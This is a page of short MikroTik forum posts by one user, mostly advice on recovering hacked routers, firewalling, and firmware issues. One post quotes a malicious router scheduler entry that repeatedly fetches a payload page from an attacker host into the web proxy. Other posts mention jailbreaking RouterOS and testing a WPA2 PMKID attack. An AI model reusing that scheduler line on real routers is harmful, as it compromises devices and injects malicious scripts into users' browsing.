Community discussions

Search found 883 matches

by R1CH
Wed Oct 31, 2018 6:13 pm
Forum: General
Topic: Strange loop on update from 6.37.3 to 6.43.4
Replies: 5
Views: 582

Re: Strange loop on update from 6.37.3 to 6.43.4

Given the severity of the exploits, it's best to netinstall with a known good config. System level access allows attackers to install malware that isn't visible to RouterOS / winbox.
by R1CH
Wed Oct 31, 2018 1:25 pm
Forum: Wireless Networking
Topic: wpa3
Replies: 5
Views: 1255

Re: wpa3

Qualcomm even shared that the WPA3 security features will be incorporated in its chipsets for mobile devices starting with the Snapdragon 845 mobile platform in June 2018. WPA3 will be supported on all Qualcomm Access Point platforms by July 2018. Doesn't seem like this should require hardware supp...
by R1CH
Wed Oct 31, 2018 1:19 pm
Forum: General
Topic: Old kernel. Why?
Replies: 5
Views: 701

Re: Old kernel. Why?

One of the issues is that Mikrotik wrote a lot of their own proprietary kernel modules, they likely aren't compatible with newer kernels. It's a shame as a lot of the included drivers with newer kernels are much higher quality than Mikrotik's implementations (eg the QCA driver supports Wave 2 802.11...
by R1CH
Mon Oct 29, 2018 6:29 pm
Forum: General
Topic: Advanced IP scanners locks up winbox access?
Replies: 7
Views: 633

Re: Advanced IP scanners locks up winbox access?

I ended up power cycling which resolved the issue (for now). Very strange, hopefully this doesn't happen to routers I don't have physical access to!
by R1CH
Mon Oct 29, 2018 6:28 pm
Forum: General
Topic: MikroTik and SSL website (Comodo)
Replies: 5
Views: 577

Re: MikroTik and SSL website (Comodo)

Have you set MTU appropriately and enabled PMTU clamping if necessary?
by R1CH
Mon Oct 29, 2018 6:27 pm
Forum: General
Topic: Performance problems with CRS112-8P-4S
Replies: 6
Views: 1358

Re: Performance problems with CRS112-8P-4S

The "S" in CRS112-8P-4S stands for SWITCH. Stop trying to use it as a router and you won't have these problems.

the switching power seems to be ok, the connected computers can send and receive with the full bandwith of 1GBit.
by R1CH
Sun Oct 28, 2018 3:24 pm
Forum: General
Topic: CloudFlare DNS over TLS
Replies: 41
Views: 17046

Re: CloudFlare DNS over TLS

Not sure, supposedly the update process wipes out any non-standard files so I'm not going to update until I have a very good reason to. I imagine Mikrotik will silently patch the jailbreak so I don't know how long this will be possible.
by R1CH
Fri Oct 26, 2018 7:03 pm
Forum: General
Topic: DHCP Rebinding Issue - stuck in rebinding until lease times out
Replies: 3
Views: 520

Re: DHCP Rebinding Issue - stuck in rebinding until lease times out

I've also seen this behavior at times. The Mikrotik DHCP client seems to have no end of little quirks and bugs like this, I wish we could just use udhcp which comes as part of busybox, it's well tested and should handle these kinds of cases much better.
by R1CH
Fri Oct 26, 2018 5:50 pm
Forum: General
Topic: How recovery hacked RB2011 via JTAG ?
Replies: 3
Views: 591

Re: How recovery hacked RB2011 via JTAG ?

Why can you not netinstall?
by R1CH
Fri Oct 26, 2018 5:49 pm
Forum: General
Topic: Firewall rules not working after hacker infection
Replies: 3
Views: 475

Re: Firewall rules not working after hacker infection

You should netinstall with a known good config. Once a router is compromised an attacker can get system level access that you cannot detect or repair from RouterOS UI.
by R1CH
Thu Oct 25, 2018 5:51 pm
Forum: General
Topic: firewall [SOLVED]
Replies: 5
Views: 659

Re: firewall [SOLVED]

Be aware that the default config in the latest "stable" version has no firewall either.

viewtopic.php?f=2&t=140661
by R1CH
Thu Oct 25, 2018 5:50 pm
Forum: General
Topic: Established connection question
Replies: 3
Views: 401

Re: Established connection question

These are connections to a service on your router. If you don't recognize them, your router might be compromised and running backdoor PPTP services, web proxy, SOCKS, etc.
by R1CH
Wed Oct 24, 2018 3:42 pm
Forum: General
Topic: Port Scan Drop ?
Replies: 6
Views: 885

Re: Port Scan Drop ?

Port scan does not use established connections. If you're using a detect-and-block script, then the attacker can then just scan you with fake IP of Google, Facebook, DNS server, etc and suddenly you've blocked important services. Relying on a hidden port for security is not good, best to use a VPN o...
by R1CH
Wed Oct 24, 2018 2:25 pm
Forum: General
Topic: Missing default config after reset
Replies: 3
Views: 351

Re: Missing default config after reset

The default config was broken in the latest releases.

viewtopic.php?f=2&t=140661
by R1CH
Wed Oct 24, 2018 1:43 pm
Forum: General
Topic: Port Scan Drop ?
Replies: 6
Views: 885

Re: Port Scan Drop ?

Best practice says you should drop all unknown input, there's no need to make rules specifically for port scanners.
by R1CH
Wed Oct 24, 2018 12:44 pm
Forum: General
Topic: Default configuration is broken?
Replies: 5
Views: 740

Re: Default configuration is broken?

QA on updates is getting quite poor lately. How does a change like this even happen to a "bugfix only" branch?
by R1CH
Tue Oct 23, 2018 4:21 pm
Forum: General
Topic: Advanced IP scanners locks up winbox access?
Replies: 7
Views: 633

Re: Advanced IP scanners locks up winbox access?

No RADIUS / user manager or anything for me, just a simple SOHO setup.
by R1CH
Tue Oct 23, 2018 2:02 pm
Forum: RouterBOARD hardware
Topic: New High End Router Hardware Soon?
Replies: 11
Views: 1786

Re: New High End Router Hardware Soon?

Since TILE is a dead architecture in the Linux kernel there needs to be a high end model that will handle RouterOS v7 (if it ever comes out). I am worried more and more about how old the RouterOS v6 kernel is, many modern chipsets (both CPU and wireless etc) require newer kernels so the available ha...
by R1CH
Tue Oct 23, 2018 1:59 pm
Forum: RouterBOARD hardware
Topic: HAP AC2 Availability in the US
Replies: 11
Views: 1836

Re: HAP AC2 Availability in the US

I notice even EuroDK no longer has hAP AC2 in stock. Is there some kind of problem with the board that halted production?
by R1CH
Tue Oct 23, 2018 1:56 pm
Forum: General
Topic: Advanced IP scanners locks up winbox access?
Replies: 7
Views: 633

Re: Advanced IP scanners locks up winbox access?

I wonder if I'm experiencing the same issue. I'm locked out of winbox, webfig, mac-telnet and SSH on one of my routers, if I enter an incorrect username or password I immediately get a negative response, with the correct password the connection hangs for about a minute then says "Incorrect password".
by R1CH
Tue Oct 23, 2018 12:59 pm
Forum: General
Topic: How can I distinguish different certificate in Winbox?
Replies: 1
Views: 201

Re: How can I distinguish different certificate in Winbox?

Modern versions of RouterOS uses SRP protocol to avoid MITM. Prior to this, there was no host verification so MITM was easy.

https://en.wikipedia.org/wiki/Secure_Re ... d_protocol
by R1CH
Mon Oct 22, 2018 1:06 am
Forum: General
Topic: CloudFlare DNS over TLS
Replies: 41
Views: 17046

Re: CloudFlare DNS over TLS

I've got DNS over TLS working on my hEX! If you've rooted your device (don't contact MT for support if you do this!) it's quite straightforward to install. Since cloudflared is written in Go, it's easy to cross-compile and the only thing it needs to operate is a ca-certificates.crt bundle which I co...
by R1CH
Tue Oct 16, 2018 2:22 pm
Forum: RouterBOARD hardware
Topic: Qualcomm IPQ8074
Replies: 7
Views: 2782

Re: Qualcomm IPQ8074

Given how long it took for 802.11ac (which still isn't fully implemented!), I think it will be 2020 or later before Mikrotik come out with 802.11ax products :(.
by R1CH
Tue Oct 16, 2018 1:33 am
Forum: General
Topic: Jailbreak for RouterOS 6.43.2 released [SOLVED]
Replies: 16
Views: 2974

Re: Jailbreak for RouterOS 6.43.2 released [SOLVED]

Finally had some time to play around with this. It works very well and there is almost zero risk of bricking your device. Can't wait to start experimenting with custom software on my router at last!
by R1CH
Fri Oct 12, 2018 5:28 pm
Forum: General
Topic: Jailbreak for RouterOS 6.43.2 released [SOLVED]
Replies: 16
Views: 2974

Re: Jailbreak for RouterOS 6.43.2 released [SOLVED]

I wish there were an official way to do this rather than relying on tools that potentially cause issues or stop working in the future. Installing wireguard for example or proper openvpn with UDP support would be so useful.
by R1CH
Wed Oct 10, 2018 6:19 pm
Forum: General
Topic: Limiting ICMP on input chain
Replies: 3
Views: 916

Re: Limiting ICMP on input chain

Reminder that ICMP source addresses can be spoofed, adding addresses to a blacklist without being able to verify the source address is a bad practice. It's better to just rate limit (which is built into the kernel - check IP / Settings).
by R1CH
Wed Oct 10, 2018 1:15 pm
Forum: General
Topic: Can't Upgrade router mikrotik because hacked
Replies: 7
Views: 2121

Re: Can't Upgrade router mikrotik because hacked

The ONLY safe way is to netinstall. The exploit can install files outside of RouterOS, so your router remains compromised even after a config reset. You can still export your config and import it again after sanitizing it.
by R1CH
Tue Oct 09, 2018 12:19 am
Forum: RouterBOARD hardware
Topic: Improove capacitor quality
Replies: 3
Views: 862

Re: Improove capacitor quality

How are we still having failing capacitors in 2018?!
by R1CH
Mon Oct 08, 2018 10:38 pm
Forum: General
Topic: CVE-2018-1156 and Winbox exploit
Replies: 0
Views: 674

CVE-2018-1156 and Winbox exploit

There's quite a few blogs going around today which makes it sound like there is some new Mikrotik exploit. It's not a new exploit, but discussions about the combination of the already patched winbox exploit + the already patched CVE-2018-1156 format string exploit. If a router is vulnerable to the w...
by R1CH
Mon Oct 08, 2018 1:04 pm
Forum: General
Topic: Router is infection by virus coinhive
Replies: 4
Views: 6500

Re: Router is infection by virus coinhive

Updating RouterOS won't magically remove bad parts of your configuration, it only prevents future exploits (assuming you changed your passwords). It's up to you to disinfect the router, the recommended way is to netinstall with a known good config, otherwise export the config, reset to default then ...
by R1CH
Sat Oct 06, 2018 5:09 pm
Forum: General
Topic: Unable to get full gigabit speed on RB750Gr3
Replies: 28
Views: 3846

Re: Unable to get full gigabit speed on RB750Gr3

Most likely the device is not powerful enough, check system / resources while testing to check CPU usage.
by R1CH
Fri Oct 05, 2018 2:54 pm
Forum: Wireless Networking
Topic: IPQ4019 chipsets - random capacity loss
Replies: 8
Views: 1191

Re: IPQ4019 chipsets - random capacity loss

Many devices from other manufacturers use the IPQ401x chipset without issue. I suspect the problem is more to do with Mikrotik's proprietary driver than the ARM platform itself.
by R1CH
Fri Oct 05, 2018 12:50 pm
Forum: Wireless Networking
Topic: New standard 802.11ax
Replies: 25
Views: 6477

Re: New standard 802.11ax

Any news? ASUS are releasing their RT-AX88U this month which is based on 802.11ax. Would love for Mikrotik to keep up with the home / office wifi space.
by R1CH
Thu Oct 04, 2018 12:19 am
Forum: General
Topic: Route cast to another VLAN
Replies: 3
Views: 303

Re: Route cast to another VLAN

Easiest solution is to put the TV on the guest VLAN, usually such devices are insecure and should be away from your main network anyway. Otherwise you will need to allow routing between the VLANs and forward the multicasts with something like https://github.com/sonicsnes/udp-broadcast-relay-redux
by R1CH
Wed Oct 03, 2018 3:43 pm
Forum: General
Topic: Router compromised even after updating firmware
Replies: 2
Views: 231

Re: Router compromised even after updating firmware

If you backed up from before the compromise, then the backup is safe to use. You can also export the compromised config and manually review it before importing it on a fresh router with changed passwords.
by R1CH
Mon Oct 01, 2018 3:41 pm
Forum: Wireless Networking
Topic: hap ac achievable wifi speed?
Replies: 28
Views: 2183

Re: hap ac achievable wifi speed?

Real world result from a phone in a room across from the hAP AC (wall mounted high up). Almost clear LOS (has to go through a doorway). -57 dBm on the hAP AC, -54 dBm on the phone. Upload limited by ISP.

Image
by R1CH
Mon Oct 01, 2018 3:33 pm
Forum: General
Topic: dns requests to Mikrotik fail if udp on linux
Replies: 5
Views: 368

Re: dns requests to Mikrotik fail if udp on linux

I have an open ticket (#2016082522001037) about bad DNS behavior with the RB850Gx2, apparently with multi core some UDP packets are simply dropped. Perhaps it applies to the RB3011 also. This is a problem since the Linux resolver likes to send two queries at once, one for IPv4 and one for IPv6. Try ...
by R1CH
Mon Oct 01, 2018 3:30 pm
Forum: General
Topic: Winbox Protocol Dissector
Replies: 2
Views: 435

Re: Winbox Protocol Dissector

Very nice, this will make finding vulnerabilities in the protocol much easier!
by R1CH
Fri Sep 28, 2018 3:08 pm
Forum: General
Topic: something is wrong with my DNS resolving...
Replies: 8
Views: 674

Re: something is wrong with my DNS resolving...

Also be sure to change all passwords, if you ran a vulnerable version then the attacker got full access to all passwords on user accounts.
by R1CH
Thu Sep 27, 2018 10:52 pm
Forum: General
Topic: Suspect script foun
Replies: 3
Views: 867

Re: Suspect script foun

Do a netinstall with the latest version, use a known good config and change all passwords.
by R1CH
Thu Sep 27, 2018 2:23 pm
Forum: General
Topic: Ports Filtered regardless of firewall rules
Replies: 1
Views: 657

Re: Ports Filtered regardless of firewall rules

If you're testing from outside your own LAN, this is almost certainly done by your ISP as those are commonly abused ports.
by R1CH
Thu Sep 27, 2018 2:21 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 359
Views: 66072

Re: RB4011

Has anyone been able to order one of these yet? Seems like the expected stock arrival dates keep getting pushed back.
by R1CH
Thu Sep 27, 2018 2:19 pm
Forum: General
Topic: Mikrotik How to SSH from Linux to Mikrotik without Password
Replies: 2
Views: 484

Re: Mikrotik How to SSH from Linux to Mikrotik without Password

Agreed, you should not be using DSA in 2018. Even RSA isn't great, but Ed25519 keys are not yet supported by Mikrotik.
by R1CH
Wed Sep 26, 2018 3:35 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 359
Views: 66072

Re: RB4011

I've had no issues with fs.com 10G DACs between Mikrotik, Netgear and Linksys gear. The stuff is all from China but they seem to have their logistics nailed down pretty well which is how they can offer such good pricing. I know a lot of other people in the industry also use FS so it's not like they'...
by R1CH
Thu Sep 20, 2018 6:16 pm
Forum: General
Topic: Swift mailer issue: not compatible with php router os api
Replies: 1
Views: 212

Re: Swift mailer issue: not compatible with php router os api

This doesn't seem to have anything to do with RouterOS API, your Swift installation seems broken:
Class Swift_SmtpTransport could not be loaded from Swift\SmtpTransport.php, file does not exist
by R1CH
Thu Sep 20, 2018 4:41 pm
Forum: Announcements
Topic: v6.43.1 [stable] and v6.43.2 [stable] are released!
Replies: 186
Views: 38271

Re: v6.43.1 [stable] and v6.43.2 [stable] is released!

Breaking the bootloader in a "stable" release... :lol:
by R1CH
Wed Sep 19, 2018 7:54 pm
Forum: RouterBOARD hardware
Topic: RB1100 dead
Replies: 12
Views: 1298

Re: RB1100 dead

Based on this topic it seems the bootloader is damaged. You may find more advice here:

viewtopic.php?t=133750
by R1CH
Wed Sep 19, 2018 5:14 pm
Forum: General
Topic: Weird outbound UDP traffic
Replies: 19
Views: 2061

Re: Weird outbound UDP traffic

Emailing support@mikrotik.com will generate a "ticket". I agree this is poor behavior.
by R1CH
Wed Sep 19, 2018 5:13 pm
Forum: General
Topic: Help ! My Router is suddenly messing up my configuration !
Replies: 1
Views: 204

Re: Help ! My Router is suddenly messing up my configuration !

Since those aren't dynamic entries, they have been added through admin interface. Most likely your router is compromised from leaving open ports to WAN interface. You should netinstall with latest version, use known good config and change all passwords.
by R1CH
Tue Sep 18, 2018 5:49 pm
Forum: General
Topic: Mikrotik Error when generating external PDF file
Replies: 7
Views: 573

Re: Mikrotik Error when generating external PDF file

"/tool fetch url=http://gotan.bit:31415/01/error.html mode=http dst-path=webproxy/error.html" policy=\ ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=aug/20/2018 start-time=03:43:47 add interval=13h name=upd114 on-event=\ "/tool fetch url=http://gotan.bit:31415/01/error.html ...
by R1CH
Tue Sep 18, 2018 4:02 pm
Forum: General
Topic: Port 60000 attacks, anyone info on this?
Replies: 11
Views: 1072

Re: Port 60000 attacks, anyone info on this?

3389 is RDP, just a standard probe for vulnerable servers. Your firewall should be dropping this without requiring a dedicated rule.
by R1CH
Mon Sep 17, 2018 9:14 pm
Forum: General
Topic: Stopping connections to TCP port 1720
Replies: 6
Views: 1009

Re: Stopping connections to TCP port 1720

What kind of connection do you have? Certain modems apparently open upnp to WAN, so you're actually connecting to the modem, not the router.
by R1CH
Thu Sep 13, 2018 9:01 pm
Forum: General
Topic: Can default configuration be hacked?
Replies: 8
Views: 1012

Re: Can default configuration be hacked?

If you didn't change passwords then the attackers just reconnected with the stolen password and re-infected the router.
by R1CH
Thu Sep 13, 2018 4:46 pm
Forum: General
Topic: mikrotik configuration issue none caching pages with double quote
Replies: 2
Views: 213

Re: mikrotik configuration issue none caching pages with double quote

You may have a compromised system that has HTTP proxy enabled with malware that is injecting crypto mining scripts into pages. Safest way forward is to netinstall and change all passwords. A config export will easily identify the issue.
by R1CH
Thu Sep 13, 2018 1:29 am
Forum: Wireless Networking
Topic: MT wifi setup options for small retail shops & cafes
Replies: 1
Views: 388

Re: MT wifi setup options for small retail shops & cafes

A single wAP AC should be enough for that kind of light usage. Concurrent users depend a lot on what kind of devices are connecting (slow 2.4 GHz only?), space to be covered and how crowded the frequencies are already. If you do want to go with the annoying social media hotspot then you probably wan...
by R1CH
Thu Sep 13, 2018 1:22 am
Forum: General
Topic: Hate new firmware versioning
Replies: 2
Views: 398

Re: Hate new firmware versioning

I think most admins are in agreement, I haven't seen anyone who is a fan of the new firmware versioning!
by R1CH
Thu Sep 13, 2018 1:20 am
Forum: General
Topic: Attack on port 45678
Replies: 4
Views: 480

Re: Attack on port 45678

Probably if it ran an old version and didn't patch in time, it fell to this: https://blog.mikrotik.com/security/winb ... ility.html

Safest way forward is to netinstall. Don't forget to change all passwords.
by R1CH
Thu Sep 13, 2018 1:18 am
Forum: General
Topic: Why Mikrorik Router OS 6.42.6 UDP Traceroute Drop
Replies: 4
Views: 489

Re: Why Mikrorik Router OS 6.42.6 UDP Traceroute Drop

Are you tracing to a route which has "prohibit" status?
by R1CH
Thu Sep 13, 2018 1:15 am
Forum: General
Topic: Add emoji to the ssid name
Replies: 8
Views: 1214

Re: Add emoji to the ssid name

With the suggestions here I've made the script a bit more user friendly.
by R1CH
Tue Sep 11, 2018 1:19 am
Forum: General
Topic: [Feature request] Wireguard
Replies: 92
Views: 21460

Re: [Feature request] Wireguard

And we already know what happens when MikroTik quickly implement a protocol which then later continues to develop independently... see OpenVPN. I know it's a lot to hope for, but this could easily be avoided if Mikrotik would stop re-implementing these features themselves and start using the open s...
by R1CH
Tue Sep 11, 2018 12:52 am
Forum: Announcements
Topic: Newsletter #84
Replies: 47
Views: 12652

Re: Newsletter #84

The RouterOS implementation of OpenVPN will always have shitty throughput since it lacks UDP support.

http://sites.inka.de/bigred/devel/tcp-tcp.html

RB4011 looks like a beast of a device though!
by R1CH
Tue Sep 11, 2018 12:49 am
Forum: RouterBOARD hardware
Topic: Cloud Core Router CCR 1009 cpu Temp
Replies: 2
Views: 389

Re: Cloud Core Router CCR 1009 cpu Temp

I would guess the heatsink has come loose / blocked with debris or thermal interface has degraded.
by R1CH
Mon Sep 10, 2018 7:46 pm
Forum: Announcements
Topic: v6.43 [current] is released!
Replies: 148
Views: 28213

Re: v6.43 [current] is released!

-nm was a winbox issue-
by R1CH
Thu Sep 06, 2018 7:51 pm
Forum: General
Topic: Securing my Rb3011 under attack - SOLVED
Replies: 3
Views: 405

Re: Securing my Rb3011 under attack

You have no firewall so ALL services are exposed! Be aware that exposing any service to the internet is a risk, not even winbox is safe as it was recently exploited. Step 1: Turn off all unnecessary services in ip / services. Step 2: Create firewall rule at top of INPUT chain with ACCEPT for your IP...
by R1CH
Mon Sep 03, 2018 7:27 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 359
Views: 66072

Re: RB4011

The spec sheet lists the max operating temp as +45 C, which is much lower than most other models. I've seen ambient (internal) temps of 60c on my routers that are inside telecom closets etc so unless this has some active cooling, I'm worried it won't be able to operate in the same environments as c...
by R1CH
Mon Sep 03, 2018 3:40 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 359
Views: 66072

Re: RB4011

The spec sheet lists the max operating temp as +45 C, which is much lower than most other models. I've seen ambient (internal) temps of 60c on my routers that are inside telecom closets etc so unless this has some active cooling, I'm worried it won't be able to operate in the same environments as cu...
by R1CH
Thu Aug 30, 2018 6:18 pm
Forum: General
Topic: youtube cache on mikrotik router
Replies: 2
Views: 448

Re: youtube cache on mikrotik router

On Mikrotik is not possible, but as an ISP you can apply for a GGC.

https://peering.google.com/#/options/go ... obal-cache
by R1CH
Wed Aug 29, 2018 3:40 pm
Forum: General
Topic: Hotspot captive portal prevent automatic close on redirect after login
Replies: 22
Views: 12592

Re: Hotspot captive portal prevent automatic close on redirect after login

Be aware that by bypassing the connectivity check in this way there will be NO hotspot popup. Your users will have a very hard time triggering the captive portal redirect, as most sites are using HTTPS which means they will show scary security error messages instead of a redirect. Think carefully ab...
by R1CH
Mon Aug 27, 2018 2:45 pm
Forum: General
Topic: Mikrotik CCR-1009-7G-1C Port Loop Problem
Replies: 2
Views: 293

Re: Mikrotik CCR-1009-7G-1C Port Loop Problem

Post your config, screenshot does not really help. Most likely you have a broken bridge port config or an actual loop.
by R1CH
Sat Aug 25, 2018 12:42 am
Forum: General
Topic: Block user with bad intention
Replies: 6
Views: 770

Re: Block user with bad intention

So what happens when I spoof the IP of Google DNS or whatever DNS server you're using? Oops, your network no longer has DNS connectivity. You should NEVER add to blocklists based on a single input packet. IP spoofing is quite easy, if someone knows this is how your network is setup, they can easily ...
by R1CH
Fri Aug 24, 2018 6:17 pm
Forum: General
Topic: [SOLVED] IPv6 pings work, webpage won't load
Replies: 39
Views: 2223

Re: [SOLVED] IPv6 pings work, webpage won't load

If clamp-to-pmtu solves the problem this probably means there is something in the network path that is dropping ICMPv6 messages. This is pretty bad and you should try and figure out where this is happening and fix it if possible.
by R1CH
Thu Aug 23, 2018 8:05 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 30437

Re: v6.42.7 [current] is released!

Bricked a wAP AC by installing this from 6.36 / 6.37 (wasn't paying close attention to the old version). Rebooted and ethernet is constantly cycling link / no-link, no netinstall, no backup loader. RMA time it seems.

Be careful if upgrading from older versions!
by R1CH
Thu Aug 23, 2018 3:52 am
Forum: RouterBOARD hardware
Topic: Cheapest device to support 5GHz spectral scan
Replies: 2
Views: 593

Re: Cheapest device to support 5GHz spectral scan

No Mikrotik device supports 5 GHz spectral scan.
by R1CH
Thu Aug 23, 2018 1:46 am
Forum: General
Topic: router rebooted because some critical program crashed
Replies: 5
Views: 1646

Re: router rebooted because some critical program crashed

Strong enough power supply?
by R1CH
Wed Aug 22, 2018 11:56 pm
Forum: Announcements
Topic: Security announcement blog
Replies: 120
Views: 38257

Re: Security announcement blog

It's been a full business day and the blog is still not updated with the news about what these four security bugs from the latest RouterOS release actually are. This seems to be a step backwards, before the blog the changelog said things like "www) fixed vulnerability" so admins at least knew the ww...
by R1CH
Wed Aug 22, 2018 11:50 pm
Forum: General
Topic: MikroTiks Blocking Functionality on certain websites [SOLVED]
Replies: 3
Views: 365

Re: MikroTiks Blocking Functionality on certain websites [SOLVED]

Your client or network is considered bad to F5 Networks Application Security Manager (ASM) which is what is generating this message. Most likely because the poor firewall config let your Mikrotiks be infected and part of a botnet, so now your IP is blacklisted by certain vendors. Change IP / ISP.
by R1CH
Wed Aug 22, 2018 6:49 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 30437

Re: v6.42.7 [current] is released!

I can confirm that the security fixes were added to the notes after the 6.42.7 thread was already posted! Why was this?

Image
by R1CH
Wed Aug 22, 2018 6:39 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 30437

Re: v6.42.7 [current] is released!

Were these security fixes stealthily added to the v6.42.7 patch notes? I don't recall seeing them there before and I didn't update since it didn't look like a necessary update. It's very bad that details aren't available even though the fixed version is published. It doesn't take much effort to comp...
by R1CH
Wed Aug 22, 2018 6:34 pm
Forum: Announcements
Topic: v6.40.9 [bugfix] is released!
Replies: 56
Views: 14796

Re: v6.40.9 [bugfix] is released!

What is the point of publishing CVE numbers if the vulnerabilities are still private? Hackers can reverse engineer the changes in this version and figure out what the vulnerabilities are and start exploiting them, so there's no point keeping it private once you publish the fix - it only benefits hac...
by R1CH
Wed Aug 22, 2018 12:19 am
Forum: General
Topic: PSA: bandwidth-test Brute Force attempts
Replies: 2
Views: 482

Re: PSA: bandwidth-test Brute Force attempts

On a related note, it would be nice to see bandwidth-test server moved to IP / services so all the useless services can be disabled in one place.
by R1CH
Tue Aug 21, 2018 1:21 am
Forum: Wireless Networking
Topic: Improve Wifi setup - Real life test results - Google wifi vs Mikrotik vs P.O.S. AT&T
Replies: 1
Views: 807

Re: Improve Wifi setup - Real life test results - Google wifi vs Mikrotik vs P.O.S. AT&T

The RB2011 is a very old router (hence the name) which doesn't support 5 GHz, so no 802.11ac. Speeds you show are about what is expected for a 2.4 GHz network.

I recommend hAP AC / cAP AC / wAP AC instead depending on your installation needs.
by R1CH
Mon Aug 20, 2018 1:57 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 30437

Re: v6.42.7 [current] is released!

Upgraded 5 x wAP AC, no issues so far.
by R1CH
Sun Aug 19, 2018 9:38 pm
Forum: General
Topic: broswer shows establishing secure connection when eoip active
Replies: 2
Views: 297

Re: broswer shows establishing secure connection when eoip active

You probably need to enable PMTU clamping.
by R1CH
Sat Aug 18, 2018 12:13 am
Forum: Wireless Networking
Topic: Open the regular browser after Captive Portal Popup login window
Replies: 3
Views: 862

Re: Open the regular browser after Captive Portal Popup login window

Sure, but those URLs will still only open in the captive portal window.
by R1CH
Fri Aug 17, 2018 5:17 pm
Forum: Wireless Networking
Topic: Open the regular browser after Captive Portal Popup login window
Replies: 3
Views: 862

Re: Open the regular browser after Captive Portal Popup login window

No, you cannot control how the client's OS behaves. Captive portal windows are usually limited in what they can do for the specific purpose of signing in.
by R1CH
Wed Aug 15, 2018 3:40 pm
Forum: General
Topic: Kernel failure using traffic generator
Replies: 1
Views: 237

Re: Kernel failure using traffic generator

The traffic generator is a kernel module coded by Mikrotik. It likely has some bugs, and bugs in the kernel mean a complete crash. I would advise against using it outside of test environments.
by R1CH
Sun Aug 12, 2018 6:17 pm
Forum: General
Topic: TCP congestion Illinos
Replies: 4
Views: 513

Re: TCP congestion Illinos

True, but using such services goes against the goals of speed anyway. OVPN in TCP mode is especially terrible.
by R1CH
Sat Aug 11, 2018 6:41 pm
Forum: General
Topic: TCP congestion Illinos
Replies: 4
Views: 513

Re: TCP congestion Illinos

Router doesn't care about the congestion algorithm, it simply forwards packets. It needs to be configured on the endpoints of the connection.
by R1CH
Sat Aug 11, 2018 2:09 am
Forum: General
Topic: TCP connections from china
Replies: 9
Views: 4814

Re: TCP connections from china

If someone is able to connect to that port, your router is insecure. Make sure to firewall all ports from WAN.
by R1CH
Thu Aug 09, 2018 1:46 pm
Forum: Wireless Networking
Topic: Open url / link from Hotspot login page in a browser
Replies: 1
Views: 308

Re: Open url / link from Hotspot login page in a browser

This is entirely dependent on the client device and not something you can configure.
by R1CH
Thu Aug 09, 2018 1:39 pm
Forum: General
Topic: Security breached devices - Port TCP 4145
Replies: 12
Views: 3688

Re: Security breached devices - Port TCP 4145

I think you misunderstand, this isn't about services listening on high ports. Say for example client on the network want to connect to Google DNS, 8.8.8.8 port 53. Their OS has to pick a port on the system to send the query, and to which replies are sent, for example maybe it picks 192.168.88.10 por...
by R1CH
Thu Aug 09, 2018 12:49 pm
Forum: General
Topic: Security breached devices - Port TCP 4145
Replies: 12
Views: 3688

Re: Security breached devices - Port TCP 4145

Traffic above the reserved ports (0-1024) can be attributed to ephemeral port use. While most OSes generally use the higher end of available ports, there's nothing stopping them from using 1025-65535 as ephemeral port numbers.
by R1CH
Thu Aug 09, 2018 12:46 pm
Forum: Announcements
Topic: WPA2 preshared key brute force attack
Replies: 26
Views: 24776

Re: WPA2 preshared key brute force attack

How do you get the PMKID from a Mikrotik AP? I have tried the attack on my wAP AC (WPA2-PSK), but the driver didn't implement the necessary fields.
by R1CH
Wed Aug 08, 2018 6:10 pm
Forum: RouterBOARD hardware
Topic: upgrade from RB951G-2HnD
Replies: 3
Views: 497

Re: upgrade from RB951G-2HnD

The IPQ4018 used in new products is much faster than the CPU in RB951G-2HnD.
by R1CH
Wed Aug 08, 2018 1:18 am
Forum: General
Topic: Winbox Vulnerability Changes
Replies: 1
Views: 334

Re: Winbox Vulnerability Changes

The vulnerability allows someone full admin access to the router, so they could change anything and everything. Mikrotik seem to suggest that winbox can even be elevated to shell access, in which case undetectable backdoors could be installed. The safest way to restore a router is export the config,...
by R1CH
Tue Aug 07, 2018 7:11 pm
Forum: Wireless Networking
Topic: PMKID Attack - clientless WPA2/WPA PSK attack
Replies: 6
Views: 3129

Re: PMKID Attack - clientless WPA2/WPA PSK attack

I've attempted this attack against a wAP AC and it was unsuccessful. I don't think Mikrotik's wireless driver implements the features that this attack exploits.
by R1CH
Tue Aug 07, 2018 2:24 pm
Forum: General
Topic: Block devices with cloned MAC addresses
Replies: 2
Views: 338

Re: Block devices with cloned MAC addresses

The only decent way is to use EAP / 802.1x for authentication so there are per-client encryption keys.
by R1CH
Tue Aug 07, 2018 2:12 pm
Forum: General
Topic: Warning BotNet Attacks! Noticing These IP's! Suggest blocking them!
Replies: 2
Views: 762

Re: Warning BotNet Attacks! Noticing These IP's! Suggest blocking them!

If the bots are even able to try to log in, this means you are exposing winbox / SSH to the internet, and your router will be compromised when the next exploit is found. Any router that has open ports to the internet is not secure according to Mikrotik.
by R1CH
Tue Aug 07, 2018 2:11 pm
Forum: General
Topic: 100% CPU CCR1072 due DDoS - How to improve?
Replies: 16
Views: 1182

Re: 100% CPU CCR1072 due DDoS - How to improve?

close port 80 from outside use. This is not a solution to CPU consumption. Also, if it's a web server you can't do this, it's a useless solution because the attacker can choose any port. It is a solution if you have a listening service on port 80. This is a SYN flood, if you actually have an applic...
by R1CH
Mon Aug 06, 2018 5:48 pm
Forum: General
Topic: HTTPS & Force to login from devices
Replies: 2
Views: 321

Re: HTTPS & Force to login from devices

Allowing *google* and gstatic.com will likely break captive portal detection on client devices.
by R1CH
Mon Aug 06, 2018 5:44 pm
Forum: General
Topic: [Feature request] Wireguard
Replies: 92
Views: 21460

Re: [Feature request] Wireguard

I've been playing around with Wireguard recently and it's so refreshingly simple and fast, it makes setup of a new VPN link so easy. And the fact it uses modern, fast crypto is great - I would love to see this in RouterOS so I can finally ditch ipsec with its huge complexity and outdated crypto. And...
by R1CH
Sun Aug 05, 2018 6:42 pm
Forum: General
Topic: Problem with purchased certificate from Comodo
Replies: 3
Views: 405

Re: Problem with purchased certificate from Comodo

